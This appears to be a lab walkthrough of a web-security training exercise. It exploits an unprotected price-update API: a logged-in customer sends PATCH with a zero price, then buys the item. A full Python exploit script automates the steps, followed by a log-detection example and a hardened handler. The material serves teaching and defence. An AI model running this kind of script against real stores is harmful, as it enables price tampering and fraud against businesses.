# 2. Exploiting server-side parameter pollution in a query string

Accessing the webpage:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FfjufYA6s1jiD3pD6Cpuc%2FPasted%20image%2020240621142221.png?alt=media&#x26;token=179757b1-a2a7-41a7-9999-e33451807907" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKn4GjQctHkSYTcGOJSps%2FPasted%20image%2020240621142225.png?alt=media&#x26;token=494afc58-9ed9-4a64-a566-8b9808f2447d" alt=""><figcaption></figcaption></figure>

We have to buy this:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FetuV8j8QQBJQRMjHznTT%2FPasted%20image%2020240621142236.png?alt=media&#x26;token=45c9279a-3fe4-4d72-8991-135b8aafbd3a" alt=""><figcaption></figcaption></figure>

But we have to log in first:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FGzphleHfU7fMMCU8Rrc0%2FPasted%20image%2020240621142256.png?alt=media&#x26;token=bf7c70fb-9b46-4eab-8958-a6ecc1364893" alt=""><figcaption></figcaption></figure>

We captured the API request in Burp Suite:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Frvhl0ySqR523z0tZCZL3%2FPasted%20image%2020240621142320.png?alt=media&#x26;token=bb6b1913-cbec-4c14-b73f-98b3ae32ebe9" alt=""><figcaption></figcaption></figure>

It returns the price of the product, since we set the product ID to 1 here:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FQi7dOVOcATGZKXBb5K49%2FPasted%20image%2020240621142404.png?alt=media&#x26;token=e3ea8cdf-1966-4ee9-8760-c5be0e501975" alt=""><figcaption></figcaption></figure>

We can also find the API endpoint in the site's JavaScript file:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FqcE2Tq6go4jH7RkC31yg%2FPasted%20image%2020240621142647.png?alt=media&#x26;token=5e1ce0e8-39bb-4195-84f9-2db13009636e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FR40I2q45Jya1LluEcePE%2FPasted%20image%2020240621142719.png?alt=media&#x26;token=7d2cfa09-b66d-470d-963c-2debe560cd49" alt=""><figcaption></figcaption></figure>

We do not have enough money to purchase it, so we have to find another way:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fga3juD7DNvyYIfbuXYCz%2FPasted%20image%2020240621143244.png?alt=media&#x26;token=09b0d4d3-bb77-4b63-afff-43362102d30f" alt=""><figcaption></figcaption></figure>

Using OPTIONS to get the allowed methods:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fmy0LYzlvCJjmDqVTlXjE%2FPasted%20image%2020240621142459.png?alt=media&#x26;token=e49ec4a4-543a-43f9-9544-84f7fe2fc80a" alt=""><figcaption></figcaption></figure>

Let's try PATCH:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIaNHxQIZResv8PrgTq7H%2FPasted%20image%2020240621142544.png?alt=media&#x26;token=bbb93a9e-8623-4e73-8568-90dad4cdf90a" alt=""><figcaption></figcaption></figure>

So we have to log in:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYWp56Cdt5y9pUkNrjprh%2FPasted%20image%2020240621142610.png?alt=media&#x26;token=cfe3f4d9-26d5-4aa9-88eb-9e4eb5db5834" alt=""><figcaption></figcaption></figure>

After logging in and setting the session:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F7NVANXthzTbKTAdDXA8T%2FPasted%20image%2020240621142918.png?alt=media&#x26;token=b44009ed-f45c-4e08-a596-788a6af9549b" alt=""><figcaption></figcaption></figure>

But it says that the Content-Type header must be JSON. Let's set it to `application/json` and send an empty JSON object `{}` as the body:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FEhHyOEkRCNZJvdbpnLIL%2FPasted%20image%2020240621143046.png?alt=media&#x26;token=80694da2-cee6-43c2-b143-cf26282c0f7a" alt=""><figcaption></figcaption></figure>

Here we go: it says that we have to send a parameter called `price` in the JSON body. Let's add it and set it to 0. Since we want to buy the Leet jacket, we use the PATCH method to change its price to zero so that we can afford it:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKCuK2a5iln2xh5ae5SqS%2FPasted%20image%2020240621143312.png?alt=media&#x26;token=95a2b969-e551-4b83-b419-4325b573d82e" alt=""><figcaption></figcaption></figure>

Let's see if it changed on the website:

Here we go:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FfrDGQA8XN6JPXhv9hrOJ%2FPasted%20image%2020240621143354.png?alt=media&#x26;token=5fb1612a-94b2-439c-8e11-4efe0ac17528" alt=""><figcaption></figcaption></figure>

Now we can buy it:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIlImDD2jUCGbAmgkxk5h%2FPasted%20image%2020240621143418.png?alt=media&#x26;token=c0e18b41-6275-4b1f-9a66-5fcaf8c41601" alt=""><figcaption></figcaption></figure>
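From the defender's side, the sequence above (method enumeration with OPTIONS, rejected PATCH attempts, then an accepted PATCH followed by a checkout) is visible in an ordinary access log. The following detection logic is an added example, not part of the original walkthrough or of the lab: it runs over constructed log lines in a simplified client/user/time/request/status format and raises one alert per suspicious step, plus a correlated alert when a user checks out right after a price write was accepted. The `PRICE_ADMINS` set, the user names other than `wiener`, and the log format are assumptions made for the example.

```python
import re

# Constructed access-log lines modelled on the request sequence in this walkthrough
# (client, user, time, request line, status). They are not captured from a real server.
SAMPLE_LOG = """\
10.0.0.5 wiener [21/Jun/2024:14:23:20 +0000] "GET /api/products/1/price HTTP/1.1" 200
10.0.0.5 wiener [21/Jun/2024:14:24:59 +0000] "OPTIONS /api/products/1/price HTTP/1.1" 200
10.0.0.5 wiener [21/Jun/2024:14:25:44 +0000] "PATCH /api/products/1/price HTTP/1.1" 401
10.0.0.5 wiener [21/Jun/2024:14:29:18 +0000] "PATCH /api/products/1/price HTTP/1.1" 400
10.0.0.5 wiener [21/Jun/2024:14:33:12 +0000] "PATCH /api/products/1/price HTTP/1.1" 200
10.0.0.5 wiener [21/Jun/2024:14:34:18 +0000] "POST /cart/checkout HTTP/1.1" 302
10.0.0.9 alice [21/Jun/2024:14:40:01 +0000] "GET /api/products/2/price HTTP/1.1" 200
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)
PRICE_PATH = re.compile(r"^/api/products/\d+/price$")
READ_METHODS = {"GET", "HEAD"}
# Constructed assumption: the only accounts that are supposed to change prices.
PRICE_ADMINS = {"administrator"}


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text):
    """Return a list of (rule, user, detail) alerts for the suspicious patterns in the walkthrough."""
    alerts = []
    tampered_users = set()  # users whose price write the server actually accepted
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        user, method, path, status = rec["user"], rec["method"], rec["path"], rec["status"]
        detail = f"{method} {path} -> {status}"

        # Method enumeration against the API surface (the OPTIONS step above).
        if method == "OPTIONS" and path.startswith("/api/"):
            alerts.append(("api_method_enumeration", user, detail))

        # Any write to the price endpoint from an account that is not a price admin,
        # split by whether the server rejected it (401/400 above) or accepted it (200).
        if PRICE_PATH.match(path) and method not in READ_METHODS | {"OPTIONS"} and user not in PRICE_ADMINS:
            if status.startswith("2"):
                alerts.append(("price_write_succeeded", user, detail))
                tampered_users.add(user)
            else:
                alerts.append(("price_write_attempt", user, detail))

        # A checkout by a user whose price write was accepted is the complete chain.
        if method == "POST" and path == "/cart/checkout" and user in tampered_users:
            alerts.append(("checkout_after_price_tamper", user, detail))
    return alerts


if __name__ == "__main__":
    for rule, user, detail in analyse(SAMPLE_LOG):
        print(f"{rule:28} {user:10} {detail}")
```

The `price_write_attempt` rule fires even on rejected requests on purpose: the two 4xx responses in the sample are the server's own error messages walking the client towards a valid request, which is worth seeing before the accepted write shows up.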

Solve it using a `python3` script:

```python
import os
import re
import sys

import requests
import urllib3

# Silence the certificate warnings that verify=False would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route every request through Burp Suite so the exchange can be inspected in the proxy history.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

session = requests.session()

# The PATCH endpoint only accepts a JSON body (see the error message above).
headers = {
    "Content-Type": "application/json"
}

price_data = {
    "price": 0
}


def get_csrf(path):
    """Fetch a page and return the CSRF token embedded in its form."""
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + path, proxies=proxies, verify=False).text)
    if not csrf:
        print(f"[-] No CSRF token found on /{path}.")
        sys.exit(1)
    return csrf[0]


def Login(username, password):
    print("[*] Get CSRF Token.")
    csrf = get_csrf("login")
    print("[*] Logging In.")
    # A dict lets requests URL-encode the fields and set the form Content-Type itself.
    data = {"csrf": csrf, "username": username, "password": password}
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)


def PatchPrice():
    print("[*] Patch The Price To 0.")
    r = session.patch(url=url + "api/products/1/price", headers=headers, json=price_data, proxies=proxies, verify=False)
    if r.status_code != 200:
        print(f"[-] PATCH failed with status {r.status_code}: {r.text}")
        sys.exit(1)


def BuyProduct():
    form_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
    }
    product_data = {"productId": 1, "redir": "PRODUCT", "quantity": 1}
    print("[*] Adding The Product To Cart.")
    session.post(url=url + "cart", headers=form_headers, data=product_data, allow_redirects=True, proxies=proxies, verify=False)
    csrf = get_csrf("cart")
    print("[*] Purchase The Product.")
    checkout_data = {"csrf": csrf}
    session.post(url=url + "cart/checkout", data=checkout_data, proxies=proxies, verify=False)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    # Normalise the lab URL so that "url + path" always produces exactly one slash.
    url = sys.argv[1].rstrip("/") + "/"
    Login("wiener", "peter")
    PatchPrice()
    BuyProduct()
    print("[+] Solved.")
```
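The lab is solvable because the PATCH handler is reachable by any logged-in customer, accepts a price of 0, and answers each rejected request with a message that says exactly what is missing next (first the Content-Type, then the `price` field). As an added example that is not part of the original walkthrough or of the lab, the following minimal handler shows the checks a fixed endpoint would perform, in order: authenticate, authorise (only an `admin` role, a constructed role name), and only then parse and validate the body, rejecting non-positive or non-numeric prices. The `Request` class, the `USERS` and `PRODUCTS` tables, the price bound and the error messages are all constructed for the example.

```python
import json
from dataclasses import dataclass, field
from typing import Optional

# Constructed in-memory stores standing in for the lab's database; the product,
# its price and the user roles are made up for this example.
PRODUCTS = {1: {"name": "Leet jacket", "price_cents": 133700}}
USERS = {"wiener": {"role": "customer"}, "administrator": {"role": "admin"}}
MAX_PRICE = 1_000_000.0


@dataclass
class Request:
    """Minimal stand-in for an HTTP request after session handling has run."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""
    user: Optional[str] = None  # username resolved from the session cookie, None if anonymous


def handle_price_update(req):
    """Handle PATCH /api/products/<id>/price and return (status_code, json_body)."""
    parts = req.path.strip("/").split("/")
    if len(parts) != 4 or parts[0] != "api" or parts[1] != "products" or parts[3] != "price":
        return 404, {"error": "not found"}
    if req.method != "PATCH":
        return 405, {"error": "method not allowed", "allow": "PATCH"}

    # 1. Authentication, then authorisation, before the body is even looked at.
    #    An unauthorised caller therefore never learns what the body should look like.
    if req.user is None:
        return 401, {"error": "authentication required"}
    if USERS.get(req.user, {}).get("role") != "admin":
        return 403, {"error": "forbidden"}

    try:
        product_id = int(parts[2])
    except ValueError:
        return 404, {"error": "not found"}
    if product_id not in PRODUCTS:
        return 404, {"error": "not found"}

    # 2. Only now enforce the JSON content type and parse the body.
    media_type = req.headers.get("Content-Type", "").split(";")[0].strip().lower()
    if media_type != "application/json":
        return 415, {"error": "Content-Type must be application/json"}
    try:
        payload = json.loads(req.body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return 400, {"error": "body is not valid JSON"}
    if not isinstance(payload, dict) or set(payload) != {"price"}:
        return 400, {"error": "body must contain exactly one field: price"}

    # 3. Validate the value: a real number, strictly positive, within a sane bound.
    #    bool is excluded explicitly because it is a subclass of int in Python.
    price = payload["price"]
    if isinstance(price, bool) or not isinstance(price, (int, float)) or not 0 < price <= MAX_PRICE:
        return 400, {"error": f"price must be a number in (0, {MAX_PRICE:.0f}]"}

    PRODUCTS[product_id]["price_cents"] = round(price * 100)
    return 200, {"productId": product_id, "price": f"${price:.2f}"}


def replay_walkthrough_request():
    """The request the walkthrough sends as wiener: PATCH with {"price": 0}."""
    req = Request("PATCH", "/api/products/1/price",
                  {"Content-Type": "application/json"}, b'{"price": 0}', user="wiener")
    return handle_price_update(req)


if __name__ == "__main__":
    print(replay_walkthrough_request())
```

With these checks the request from the walkthrough stops at the authorisation step with a bare 403, and even an administrator cannot set the price to 0, so the purchase path is never reachable through this endpoint.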
